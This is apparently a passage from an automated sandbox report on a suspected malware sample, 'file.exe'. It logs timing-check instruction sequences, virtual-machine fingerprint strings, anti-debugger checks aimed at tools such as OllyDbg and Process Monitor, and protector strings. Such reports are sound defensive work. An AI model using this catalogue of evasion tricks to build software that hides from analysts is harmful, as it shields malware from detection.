              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF79A second address: CDF79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF79E second address: CDF7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7A2 second address: CDF7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7AA second address: CDF7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F1F1851F5D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7B4 second address: CDF7D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7D7 second address: CDF7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F1851F5D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7E1 second address: CDF7EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECC84 second address: CECC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007F1F1851F5D6h 0x0000000c jl 00007F1F1851F5D6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECDC2 second address: CECDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECDC6 second address: CECDD0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF294D second address: CF2951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7052 second address: CF7084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F1F1851F5DCh 0x0000000e je 00007F1F1851F5D6h 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F1F1851F5DBh 0x0000001c jmp 00007F1F1851F5DFh 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7084 second address: CF708E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1F18DC15C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF708E second address: CF70A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEDE2 second address: CFEDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F18DC15D3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEDFB second address: CFEDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEC4C second address: CFEC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEC52 second address: CFEC67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEC67 second address: CFEC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEC6B second address: CFEC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jc 00007F1F1851F5FBh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEC7C second address: CFEC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01E4C second address: D01E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06E14 second address: D06E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0735E second address: D0736C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0736C second address: D073BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F18DC15CFh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F1F18DC15D9h 0x00000013 pop esi 0x00000014 push edi 0x00000015 jmp 00007F1F18DC15D5h 0x0000001a jnp 00007F1F18DC15C6h 0x00000020 pop edi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D073BB second address: D073C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D073C0 second address: D073CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1F18DC15C6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08207 second address: D0820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0820C second address: D0821C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1F18DC15C6h 0x0000000a jno 00007F1F18DC15C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CEC7 second address: D0CECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CECB second address: D0CEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CEDC second address: D0CF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F1851F5E2h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F1F1851F5F2h 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CF05 second address: D0CF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CF0D second address: D0CF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CA57 second address: D0CA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CA5C second address: D0CA69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F1F1851F5D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CBB3 second address: D0CBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1F18DC15D5h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F1F18DC15D0h 0x00000014 jp 00007F1F18DC15C6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CBED second address: D0CC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2742D second address: D2743F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F1F18DC15CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2743F second address: D27447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27447 second address: D2744B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2744B second address: D27451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A0CA second address: D2A0E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F18DC15CEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A0E2 second address: D2A10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1F1851F5DEh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A10F second address: D2A115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C5D9 second address: D2C5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DED4 second address: D3DEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DEE7 second address: D3DEFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F1F1851F5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F1F1851F5D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CDBB second address: D3CDC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CDC1 second address: D3CDC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CDC7 second address: D3CDF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D7h 0x00000007 jmp 00007F1F18DC15CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CDF4 second address: D3CDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CDF9 second address: D3CDFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CDFF second address: D3CE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CF5A second address: D3CF64 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F18DC15C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CF64 second address: D3CF6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CF6A second address: D3CF6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CF6F second address: D3CF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F1851F5D6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F1851F5E9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3CF95 second address: D3CFC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1F18DC15D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F1F18DC15D1h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D8D5 second address: D3D8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D8DE second address: D3D8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D8E2 second address: D3D8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D8E6 second address: D3D8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D8EC second address: D3D8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DA43 second address: D3DA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DA4E second address: D3DA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DA52 second address: D3DA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4083B second address: D40873 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F1851F5E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F1851F5E9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4093C second address: D40946 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43837 second address: D4387E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 js 00007F1F1851F5D6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F1F1851F5E4h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F1F1851F5E7h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4387E second address: D4388A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F18DC15C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539043A second address: 5390468 instructions: 0x00000000 rdtsc 0x00000002 mov ch, F6h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov ah, bh 0x0000000b pushfd 0x0000000c jmp 00007F1F1851F5DAh 0x00000011 add ax, F9D8h 0x00000016 jmp 00007F1F1851F5DBh 0x0000001b popfd 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60C4C second address: C60C52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60C52 second address: C60C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AA3A4A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5752Thread sleep count: 38 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5752Thread sleep time: -76038s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6096Thread sleep count: 61 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6096Thread sleep time: -122061s >= -30000sJump to behavior
              Source: file.exe, file.exe, 00000000.00000002.2545094889.0000000000C34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: Amcache.hve.6.drBinary or memory string: VMware
              Source: file.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.6.drBinary or memory string: vmci.sys
              Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>T
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: file.exe, 00000000.00000002.2545094889.0000000000C34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR
              Source: file.exeBinary or memory string: Program Manager
              Source: file.exe, 00000000.00000002.2545094889.0000000000C34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
